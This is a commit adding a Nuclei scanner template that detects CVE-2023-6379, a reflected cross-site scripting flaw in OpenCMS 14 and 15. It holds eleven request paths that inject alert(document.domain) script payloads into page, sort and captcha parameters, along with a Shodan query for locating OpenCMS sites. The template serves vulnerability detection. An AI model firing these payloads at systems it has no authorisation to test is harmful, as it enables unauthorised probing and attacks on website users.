Merge pull request #8902 from projectdiscovery/princechaddha-patch-5
Create CVE-2023-6379.yamlpatch-1
commit
1ed1d08a4e
|
@ -0,0 +1,61 @@
|
|||
id: CVE-2023-6379
|
||||
|
||||
info:
|
||||
name: OpenCMS 14 & 15 - Cross Site Scripting
|
||||
author: msegoviag
|
||||
severity: medium
|
||||
description: |
|
||||
Cross-site scripting (XSS) vulnerability in Alkacon Software Open CMS, affecting versions 14 and 15 of the 'Mercury' template.
|
||||
impact: |
|
||||
Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to potential session hijacking, defacement, or theft of sensitive information.
|
||||
remediation: |
|
||||
Update to version OpenCMS 16
|
||||
reference:
|
||||
- https://www.incibe.es/incibe-cert/alerta-temprana/vulnerabilidades/cve-2023-6379
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2023-6379
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
||||
cvss-score: 6.1
|
||||
cve-id: CVE-2023-6379
|
||||
cwe-id: CWE-79
|
||||
metadata:
|
||||
verified: true
|
||||
max-request: 2
|
||||
vendor: alkacon
|
||||
product: OpenCms
|
||||
shodan-query: title:"opencms"
|
||||
tags: cve,cve2023,opencms,xss,alkacon
|
||||
|
||||
http:
|
||||
- method: GET
|
||||
path:
|
||||
- '{{BaseURL}}/tagebuch/eintraege/index.html?reloaded&page=1">%3Cscript%3Ealert(document.domain)%3c%2fscript%3E'
|
||||
- '{{BaseURL}}/list-editor/index.html?reloaded&page=3">%3Cscript%3Ealert(document.domain)%3c%2fscript%3E'
|
||||
- '{{BaseURL}}/advanced-elements/list/index.html?reloaded&sort=date_asc&page=3">%3Cscript%3Ealert(document.domain)%3c%2fscript%3E'
|
||||
- '{{BaseURL}}/advanced-elements/list/list-filters/index.html?reloaded&sort=date_asc&page=2">%3Cscript%3Ealert(document.domain)%3c%2fscript%3E'
|
||||
- '{{BaseURL}}/lists/compact/index.html?reloaded&sort=date_desc&page=2">%3Cscript%3Ealert(document.domain)%3c%2fscript%3E'
|
||||
- '{{BaseURL}}/lists/elaborate/index.html?reloaded&sort=date_desc&page=2">%3Cscript%3Ealert(document.domain)%3c%2fscript%3E'
|
||||
- '{{BaseURL}}/lists/text-tiles/index.html?reloaded&sort=date_asc&page=2">%3Cscript%3Ealert(document.domain)%3c%2fscript%3E'
|
||||
- '{{BaseURL}}/lists/masonry/index.html?reloaded&sort=date_asc&page=2">%3Cscript%3Ealert(document.domain)%3c%2fscript%3E'
|
||||
- '{{BaseURL}}/blog/articles/index.html?reloaded&page=2">%3Cscript%3Ealert(document.domain)%3c%2fscript%3E'
|
||||
- '{{BaseURL}}/advanced-elements/form/index.html?formsubmit=12&formaction1=submit&InputField-11939054842=mrs&InputField-21939054842=190806&InputField-31939054842=403105&InputField-41939054842=2&InputField-51939054842=&InputField-61939054842=1&captcha_token_id=1"><script>alert(document.domain)<%2fscript>ufs5prh3qfe&captchaphrase1939054842=1'
|
||||
- '{{BaseURL}}/content-elements/job-ad/index.html?reloaded&sort=date_desc&page=1">%3Cscript%3Ealert(document.domain)%3c%2fscript%3E'
|
||||
|
||||
stop-at-first-match: true
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- '"><script>alert(document.domain)</script>" />'
|
||||
- 'OpenCms'
|
||||
condition: and
|
||||
|
||||
- type: word
|
||||
part: content_type
|
||||
words:
|
||||
- "text/html"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
Loading…
Reference in New Issue